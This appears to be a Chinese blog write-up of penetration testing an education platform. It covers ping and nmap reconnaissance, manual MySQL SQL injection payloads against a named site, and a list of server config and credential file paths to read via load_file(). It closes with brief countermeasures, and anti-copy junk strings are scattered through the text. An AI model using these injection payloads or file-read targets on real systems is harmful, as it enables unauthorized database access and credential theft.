题记:0 y3 g! B0 V6 f3 j- D' L8 k% H
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……4 s. ?5 k$ D. w/ F
第一步:获取需要的信息, F& \6 S) n7 x
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。: ` y& ~) i' J0 _+ G
注:以下为保护特用XXX代替敏感信息
Q; p; L2 E0 o1 u; F4 W顺手先PING了一下他们的域名:
4 Z; _7 a. R5 P( ~6 v+ f* Rping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)3 V6 h& S' f1 U3 ?( m' I1 Y
64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
4 M9 I$ i0 ]) Z顺便了解一下TTL,学好基础知识才能一路顺风:# ^) R# C1 ~, q) m. l- J
TTL:(Time To Live ) 生存时间
) e& F) V+ \5 C. f指定数据包被路由器丢弃之前允许通过的网段数量。1 a+ D7 l! Y: h9 m9 E4 l9 z k
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
* N& o5 V: a) z& t使用PING时涉及到的 ICMP 报文类型
1 r& _! e* R( z, C. z: H一个为ICMP请求回显(ICMP Echo Request)
% Z( F# P* B5 e) e/ P+ K$ K一个为ICMP回显应答(ICMP Echo Reply)
+ i9 n* Z; W- P' ]' R4 l% h7 lTTL 字段值可以帮助我们识别操作系统类型。* d I' h, W) V. x/ M, m& S5 d
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255' ]4 D& j& h% U: @) k. J
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64( e5 E9 V8 y" n3 u7 F% o- `$ X
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
( I! J) B" U4 U; a" |微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32" k# ~. V( U6 G0 p
当然,返回的TTL值是相同的- B3 n" q3 g( C7 R% @3 r5 G
但有些情况下有所特殊
& k2 A0 V6 [/ e' [: N2 ?$ i/ tLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64" ?% w7 M) B& r
FreeBSD 4.1, 4.0, 3.4;
, B/ {1 E/ |6 v' U- h( zSun Solaris 2.5.1, 2.6, 2.7, 2.8;
3 A% E" Y* f; F1 jOpenBSD 2.6, 2.7,
1 a: D. `% c X0 F! V1 O jNetBSD
* n7 z# y: x' ^8 ], j1 V% u& V, {HP UX 10.20
2 H. n8 I( }: WICMP 回显应答的 TTL 字段值为 2556 v) j3 R. r. k- _
Windows 95/98/98SE4 A4 m+ P( F$ v% I+ h/ f
Windows ME
: _6 H' \7 F) v0 m" q4 iICMP 回显应答的 TTL 字段值为 32
d1 x( u e) J* j% ^- bWindows NT4 WRKS- K$ h& U$ y% d7 C
Windows NT4 Server4 w; o5 A. r) h4 o) D8 u
Windows 2000
' N0 }$ ^5 k' e7 F( H# cWindows XP
- o8 S7 [8 D, j4 |0 _ICMP 回显应答的 TTL 字段值为 128, F6 E' |! v1 o7 ?7 x4 B( f
这样,我们就可以通过这种方法来辨别操作系统$ e% J% |- ]7 }
TTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的2556 u0 p8 D+ B5 U$ M$ W9 s9 L
用NMAP扫描一下:+ ?+ a' m. R, {) y6 V6 U3 a* t% D. t& d4 u
nmap -sT -O XXX.XXX.XXX.XXX6 \+ D$ J3 j* c/ X- v: P
如果没有装WinPcap则会弹出提示:0 Z. k* l5 L9 o! x1 @! D, u1 D
WARNING: Could not import all necessary WinPcap functions. You may need to upgr
( l& h, o+ ?9 A. n1 Nade to version 3.1 or higher from http://www.winpcap.org. Resorting to connect(
6 H! ?6 D, v9 v; O) mode — Nmap may not function completely
' P; `& k5 Y, t" H: t) ]TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher) X; D1 G, H$ R9 U) d9 @, ?# \
and iphlpapi.dll be installed. You seem to be missing one or both of these. Win, z. l! O5 Y; i. ^/ P' x& H
pcap is available from http://www.winpcap.org. iphlpapi.dll comes with Win98 an
1 G- k: J7 s1 ] e# ^4 kd later operating sytems and NT 4.0 with SP4 or greater. For previous windows v" L ?0 A( m" N' ^, Z! L
ersions, you may be able to take iphlpapi.dll from another system and place it i
2 H9 U. N9 N1 K; en your system32 dir (e.g. c:\windows\system32).3 Y* |/ L6 F7 Z2 n( i6 p1 h4 q0 y
QUITTING!
8 G) ]0 b. K2 x8 s到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe( w* V4 H( x( y9 c) `9 s% a
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
& s# i9 f5 N6 J {7 |9 H9 vInteresting ports on XXX.XXX.XXX.XXX:1 z" h& P8 O* d5 _! _% n
Not shown: 986 closed ports
+ a2 q/ E: t# l4 p \, p9 l. f0 MPORT STATE SERVICE: ~$ Z1 |5 _! ^: Z" I% Q
21/tcp open ftp b; B6 p1 s: U( ?; N
22/tcp open ssh" \7 I2 N, l: T% ^$ N
23/tcp open telnet7 ~. _; R* Y" E! a3 [
80/tcp open http
; e: ?5 g2 d" h9 X111/tcp open rpcbind
: r: G8 G% j7 k) a- v" {( b9 }135/tcp filtered msrpc
& C' V$ P7 a. `7 C8 s U. A( [139/tcp filtered netbios-ssn" L c8 I/ q: U
445/tcp filtered microsoft-ds
# R% ~- }& \. `513/tcp open login y# x/ B7 A8 A: k
514/tcp open shell" j5 @2 P, T7 `7 F! V; R
593/tcp filtered http-rpc-epmap
8 A- i$ V# c8 v5 M! X1720/tcp filtered H.323/Q.931
; j( O# O: o6 E! r, Z( ]3306/tcp open mysql2 u4 {4 k+ ?9 m+ S1 w# q6 ~% v
4444/tcp filtered krb524
" D4 ^% O( i, ]; W7 FDevice type: WAP
) m) A2 D* r+ U( f( l$ r4 zRunning: Linux 2.4.X
% r: O1 s5 e/ U( iOS details: DD-WRT (Linux 2.4.35s)
3 g5 h( _: |2 ^& Z/ Y( v" b: }Network Distance: 13 hops
' z9 U2 `1 ]% x# P* f/ x看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
- ], R/ c3 J, g6 X! d5 o( Alogin as:# N% H$ x6 R0 `- j6 z9 f# ]( y
Telnet23端口也是开着的,用telnet 命令链接一下:- {2 Z w6 D8 W
telnet XXX.XXX.XXX.XXX" q% }; ^0 L3 g# y( X4 D4 n; ]: E
提示:
% N6 d) L( f6 b$ J$ W6 vRed Hat Enterprise Linux Server release 5.2 (Tikanga)
/ {- r5 p" u! |- F+ T- V$ y# iKernel 2.6.18-92.el5PAE on an i6867 b, }. B7 [1 j" L
login: j0 m" g/ ~4 b0 k% n( t: Q
获取HTTP头信息:
: Y7 ?2 k: k: w( Z2 f! g9 G3 i* B在本地执行如下PHP代码
& E. L) @0 x: B0 Y9 [! g- B3 S<?php% Y7 F# ]8 X: K# d
$url = ‘XXX.XXX.XXX.XXX’;
; I% G4 J7 ^- a5 B3 _print_r(get_headers($url));+ J9 i8 v1 {) o& v# f* [
print_r(get_headers($url, 1));
" P, T9 v1 O% z) A. P, W( D?>
$ ` r- E+ z! [' B: W; q, L将以上代码保存为PHP文件,执行:* D6 j7 L5 _% S( p
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
. F; S ~1 }- y$ C s现在可以得出结论:8 ]* W6 {1 k, V, B: Y+ Y
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)+ g# U" B" |4 H! X; q Z9 W
内核版本:Kernel 2.6.18-92.el5PAE on an i686
$ L1 ]6 u& I( \& j5 Z! [WEB服务器版本:nginx/0.7.61! Z( x# \7 w% ?8 P
第二步,开始测试寻找漏洞
/ h U# F: p$ V8 J! Q# _+ M分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。6 A" x3 f/ W4 T! `- j0 }' z$ Y
1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的, }3 a8 g) W5 P% _/ q
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试- X2 Y' b. \ o1 j, b l5 c7 z
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常
8 N4 N$ ~6 {3 S+ G" g+ k dhttp://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误0 L3 W G% r% A) L
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续
' j1 X9 p) S* _" S% r" n1 y3、手工注入:: |7 g S, {; @2 j% W ]7 q
注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。
4 j$ g1 U' v9 `- ?2 S8 P8 q; O2 N3.1 猜测当前表字段数/ G. s) ?! s% }/ d7 R- I1 {1 `
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
0 A1 ~" N( E' l, x3 f( S9 L此处猜测有个简单的算法,都是有技巧的吗,呵呵, N9 |: o- Z3 C1 d2 ^0 W$ D
算法简单如下:1 ], O+ l: i1 s+ [
第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;# }* [6 g6 q( e, P0 H) Y
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;
; u+ p# H4 D! W3 e) d L! Z5 ]3 ^2 e3 Y需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
9 i0 q- @4 N; G0 _ M$ d: j. i以此来判断,是否过界,配合取中算法猜出字段数。. a5 v8 a# |( c
举例:8 }+ ]! N4 u" b) ]9 g. a
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
8 Q6 c0 W9 M. N4 Zhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误) P4 B$ k: ?' [* a% S& R8 w
此时3则为我们要找的字段数。; b6 f7 p# q1 Q1 A) ]
3.2 配合union联合查询字段在页面所位置$ M% m0 Z N* f x3 X
我们已经知道了字段数为3,此时则可以做如下操作:7 ~9 I" z: Q9 ` u$ V4 ~
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
6 Y; ~ s4 I& ~* ^9 a2 ^
M3 N1 A8 Y, q! m. v: C6 `; l这样就可以测试到哪些字段在页面上有所显示了,如图:* |) w/ _1 t- t% ^0 J3 p
# V' h7 G! Z9 C, M! D3.3 查敏感信息
8 G9 ]/ s6 {* N这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
y! m$ D, [$ D4 B9 [+ Lhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
3 y6 j8 D) r. u H$ [3.3.1 先查数据库用户、数据库名,以备后用,如图:
) q% `( N4 q. z4 s( i3 V
( b$ z! h A4 G* ^ l7 Z h- T得到数据库用户为root、数据库名为DBxx;& p7 p, R% S' b
3.3.2 查配置文件
% J/ @! |+ e! @0 w1 Y查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。
5 }5 B* m9 k/ t+ O( C查看文件有一定的条件限制:3 c( M: a4 s3 @
欲读取文件必须在服务器上, R1 o7 n& C" P$ ~+ [
必须指定文件完整的路径0 s$ P8 }- w2 U
必须有权限读取并且文件必须完全可读# R9 ?/ B+ u" }# b' W, u2 @
欲读取文件必须小于 max_allowed_packet
* ?$ P4 c0 l$ `6 eMYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
. L! ^9 M- t& Y9 o5 q# G. Z常用的一些:
% U" z. g0 Q" d/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件+ U# o9 m: F" |. m' J
/usr/local/apache2/conf/httpd.conf; p) n! B3 A9 d% U' B
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置6 \% j* ^8 c3 J9 y1 ]; n8 |: A
/usr/local/app/php5/lib/php.ini //PHP相关设置+ f' B0 m! O( G* J- W1 x
/etc/sysconfig/iptables //从中得到防火墙规则策略! U' m- D, ]0 I* N; C
/etc/httpd/conf/httpd.conf // apache配置文件
' x. s% k; x _* F( i/etc/rsyncd.conf //同步程序配置文件, N: m: ?, j7 G
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
0 u7 D2 z, N5 ?. Y1 G) W3 }/etc/my.cnf //mysql的配置文件8 q) ?0 I2 z; Y+ c+ c6 \
/etc/redhat-release //系统版本/ U% Q3 }& N6 ]* l7 H. `7 c% h
/etc/issue
0 y1 g% G9 z" p: Y5 X: t/etc/issue.net
5 O9 P; d6 y0 n2 O8 V! U3 |4 f9 B1 Yc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
: f/ }* v4 k7 A yc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码$ a9 J4 }+ e/ [$ `
c:\Program Files\Serv-U\ServUDaemon.ini7 x& k% \' A( O) U0 S9 L
c:\windows\my.ini //MYSQL配置文件' @8 \ d2 V' e3 C
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件+ G v, ]" y' c
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件, D( P/ v2 @3 B9 K
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码$ U: _( R- M8 G6 C8 |0 Y( o+ M. I* o
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
: a) N& X, Y' T. Sc:\Program Files\RhinoSoft.com\ServUDaemon.exe, h4 g8 l+ f, Y& u a
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件4 d. p# U$ I( z' K9 X( N( C
//存储了pcAnywhere的登陆密码1 @1 Y& I, M+ e6 r$ C6 O9 y
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。$ L# e2 m& E3 {4 w
这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
4 p. Z- t$ u5 S% \最后:防范措施$ g8 D4 B' k. v7 l
1、修复PHP注入漏洞;" x/ v4 ~3 ?/ M/ t( P; ^
2、Mysql使用普通权限的用户;
, z1 V0 K [% Y3、升级linux内核至最新版本; |